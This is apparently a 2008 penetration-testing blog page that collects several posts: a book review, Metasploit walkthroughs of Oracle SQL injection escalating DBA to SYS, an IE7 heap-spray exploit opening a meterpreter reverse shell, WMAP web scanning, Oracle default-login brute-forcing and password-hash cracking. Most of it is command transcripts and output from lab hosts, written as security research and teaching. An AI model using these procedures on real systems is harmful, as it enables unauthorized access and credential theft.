The Truth About Identity Theft Book Review

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and its small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths" 3-4 pages in length that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section and each vignette, while short, yields some actionable information on the topic. I didnt have any specific favorites, they were all good. Just about all of them were real world examples that they author conducted during security assessments or real life examples from people that had contacted the author or stories he had heard. Its sometimes much easier to emphasize with Susan who was a victim of identify theft and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft which tells you how to get rid of the pre-certified credit card offers, checking your credit reports, actions to take if you are a victim of identity theft and some of the pitfalls that can come up during the process.

So why 4 stars? Well mostly because I review technical security books it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other more technical books are graded much harsher. So that being said, if I had approached it being a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to protect to help them protect themselves from themselves and the rest of the bad guys out there this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

Was doing some incident response on a Windows 2003 server, I needed to verify a service pack level and installed KB's via the add remove programs program but the icon was missing.

Found the answer on how to call it via the start-->run-->appwiz.cpl

http://en.kioskea.net/faq/sujet-465-the-add-remove-programs-icon-is-missing-in-control-panel

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time it figuring out. It's pretty straight forward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an inital PoC working but it was not stable and only triggered on XP as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
sf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debuggging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their hacking netscreen talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances"

http://www.ruxcon.org.au/files/2008/gn-netscreen-of-the-dead.ppt

http://www.zdnet.com.au/news/security/soa/Ruxcon-security-gurus-hit-Sydney/0,130061744,339

Publish Post

293503,00.htm

Metasploit and WMAP

What is WMAP

"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."

Getting it all up & running

Readme is here:
http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt

Step 1: Download, patch, and install ratproxy
http://code.google.com/p/ratproxy/

Documentation: http://code.google.com/p/ratproxy/wiki/RatproxyDoc
Code (at time of this posting): http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz

Step 2: Run ratproxy and browse the site you are targeting, this will populate the database you will use/need for wmap.

**You'll need to create the database first.

msf > db_create wmaptest.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmaptest.db

Step 3: Run metasploit, load necessary plugins, and run the wmap modules.

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_connect wmaptest.db
[*] Successfully connected to the database
[*] File: wmaptest.db

Show the targets. This is populated by browsing a site with ratproxy.


msf > wmap_targets
[*] Usage: wmap_targets [options]
-h Display this help text
-p Print all available targets
-r Reload targets table
-s [id] Select target for testing

msf > wmap_targets -r
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] Added. 192.168.0.100 80 0
[*] Added. 64.233.187.99 80 0
[*] Done.


Select a target and run the print command again to ensure the right target was selected.


msf > wmap_targets -s 1
Host Port SSL
[*] => 1. 192.168.0.100 80
[*] 2. 64.233.187.99 80
[*] Done.

Display the website structure.

msf > wmap_website
[*] Website structure
[*] 192.168.0.100:80 SSL:0
ROOT_TREE
| web
| | css
| | +------gonav.css
| | web
| | | images
| | | +------storepic_4.jpg
| | | +------storepic_264.jpg
| | | +------20080717105615.jpg
| | | +------storepic_125.jpg
| | +------index.php
| | | pic
| | | | part
| | | | +------index_line_1.gif
| | | +------top_index.gif
| | | +------username.gif
| | | +------tail_bg.gif
| | | +------head_bg.gif
| | | +------login_bg.gif
[*] Done.


[*] Usage: wmap_run [options]
-h Display this help text
-t Show all matching exploit modules
-e Launch exploits against all matched targets

Show the available modules for wmap

msf > wmap_run -t
[*] Loaded auxiliary/scanner/http/wmap_ssl_vhost ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Analysis completed in 1.30465912818909 seconds.
[*] Done.

Run wmap, go get a (rum &) coke because the bruteforce directory modules are going to take awhile.

msf > wmap_run -e
[*] Launching auxiliary/scanner/http/wmap_ssl_vhost WMAP_SERVER against 192.168.0.100:80
[*] Error: 192.168.0.100
[*] Launching auxiliary/scanner/http/frontpage_login WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80/ may not support FrontPage Server Extensions
[*] Launching auxiliary/scanner/http/version WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 is running Apache/2.2.3 (CentOS)( Powered by PHP/5.1.6 )
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against 192.168.0.100:80
[*] >> Exception during launch from auxiliary/scanner/http/wmap_vhost_scanner: The following options failed to validate: DOMAIN.
[*] Launching auxiliary/scanner/http/options WMAP_SERVER against 192.168.0.100:80
[*] 192.168.0.100 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against 192.168.0.100:80
[*] http://192.168.0.100:80 is running Apache/2.2.3 (CentOS)
[*] FrontPage not found on http://192.168.0.100:80 [404 Not Found]
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR / against 192.168.0.100:80...
[-] Blank or default PATH set.
[*] Launching auxiliary/scanner/http/wmap_file_same_name_dir WMAP_DIR /web/ against 192.168.0.100:80...

---SNIP---

msf > wmap_reports
[*] Usage: wmap_reports [options]
-h Display this help text
-p Print all available reports
-s [id] Select report for display

Show available reports.

msf > wmap_reports -p
[*] Id. Created Target (host,port,ssl)
1. Sat Nov 22 22:37:04 -0500 2008 192.168.0.100,80,0
[*] Done.

Show your report.

msf > wmap_reports -s 1
WMAP REPORT: 192.168.0.100,80,0 Metasploit WMAP Report [Sat Nov 22 22:37:04 -0500 2008]
WEB_SERVER TYPE: Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 ) [Sat Nov 22 22:37:06 -0500 2008]
WEB_SERVER OPTIONS: GET,HEAD,POST,OPTIONS,TRACE [Sat Nov 22 22:37:07 -0500 2008]
DIRECTORY NAME: /admin/ Directory /admin/ found. [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:50:50 -0500 2008]
DIRECTORY NAME: /administrator/ Directory /administrator/ found. [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:51:14 -0500 2008]
DIRECTORY NAME: /cgi-bin/ Directory /cgi-bin/ found. [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:52:13 -0500 2008]
DIRECTORY NAME: /class/ Directory /class/ found. [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:52:29 -0500 2008]
DIRECTORY NAME: /db/ Directory /db/ found. [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:53:01 -0500 2008]
DIRECTORY NAME: /error/ Directory /error/ found. [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:53:31 -0500 2008]
DIRECTORY NAME: /icons/ Directory /icons/ found. [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:13 -0500 2008]
DIRECTORY NAME: /includes/ Directory /includes/ found. [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:24 -0500 2008]
DIRECTORY NAME: /js/ Directory /js/ found. [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:54:38 -0500 2008]
DIRECTORY NAME: /manual/ Directory /manual/ found. [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:55:02 -0500 2008]
DIRECTORY NAME: /template/ Directory /template/ found. [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:38 -0500 2008]
DIRECTORY NAME: /upload/ Directory /upload/ found. [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 22:57:55 -0500 2008]
DIRECTORY NAME: /usage/ Directory /usage/ found. [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY RESP_CODE: 403 [Sat Nov 22 22:57:57 -0500 2008]
DIRECTORY NAME: /web/ Directory /web/ found. [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY RESP_CODE: 302 [Sat Nov 22 22:58:08 -0500 2008]
DIRECTORY NAME: /web/class/ Directory /web/class/ found. [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:00:53 -0500 2008]
DIRECTORY NAME: /web/css/ Directory /web/css/ found. [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:16 -0500 2008]
DIRECTORY NAME: /web/db/ Directory /web/db/ found. [Sat Nov 22 23:01:26 -0500 2008]
DIRECTORY RESP_CODE: 200 [Sat Nov 22 23:01:26 -0500 2008]
VULNERABILITY DIR_LISTING: /web/css/ Directory /web/css/ discloses its contents. [Sat Nov 22 23:02:34 -0500 2008]
VULNERABILITY DIR_LISTING: /web/web/pic/ Directory /web/web/pic/ discloses its contents. [Sat Nov 22 23:02:40 -0500 2008]
VULNERABILITY PUT_ENABLED: /web/web/ Upload succeeded on /web/web/ [Sat Nov 22 23:03:18 -0500 2008]
[*] Done.

Finish your pwnage...errr pentest.

Getting your smartcard to work with Ubuntu

The big bummer of Common Access Cards (CAC) is that there hasnt been a real good solution to get it working in Linux. I've seen it done for OS X but not for Linux. Well the guys over at HR Geeks did a writeup on how to get it working, worth a look if you have made the jump to being full-time Linux.

http://www.hrgeeks.com/2008/11/21/using-a-dod-cac-with-ubuntu-and-firefox/

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me their was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thank MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Metasploit Adobe util.printf() Client-side Exploit Video

A little video on using the fileformat mixin to exploit the adobe util.printf() vulnerability.

Sorry, no audio. You'll just have to follow along.


Metasploit adobe util.printf() client-side exploit from carnal0wnage on Vimeo.

**P.S. something is jacked on Vimeo and the video is playing 2x too fast. Start the vid, pull the slider back to the beginning and hit play again and it should play at the proper speed. You also click the link below the video for bigger view.